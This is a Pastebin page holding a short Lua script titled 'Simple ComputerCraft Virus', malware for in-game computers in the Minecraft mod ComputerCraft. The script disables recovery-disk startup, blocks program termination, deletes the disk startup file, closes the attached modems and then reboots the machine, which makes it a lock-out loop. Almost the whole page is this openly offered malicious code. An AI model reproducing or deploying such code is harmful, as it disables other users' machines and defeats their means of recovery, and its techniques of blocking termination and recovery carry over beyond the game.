Advertisement
qwertz19281

CC ST VR 2.0

Feb 5th, 2016
371
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -- Simple ComputerCraft Virus
  2. --local fB=true
  3. --function fA()
  4. --    while(fB) do
  5. --        fs.delete("disk/startup")
  6. --    end
  7. --end
  8. if settings then
  9.     settings.set("shell.allow_disk_startup",false) --disables functionality of recovery discs DOT
  10. end
  11. os.pullEvent=os.pullEventRaw
  12. fs.delete("disk/startup")
  13. pcall(peripheral.call, "left","close")
  14. pcall(peripheral.call, "right","close")
  15. pcall(peripheral.call, "top","close")
  16. pcall(peripheral.call, "bottom","close")
  17. pcall(peripheral.call, "front","close")
  18. pcall(peripheral.call, "back","close")
  19. print("Brute called Snitzel!")
  20. --coroutine.create(fA)
  21. sleep(3)
  22. --kiki=fB
  23. os.reboot()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement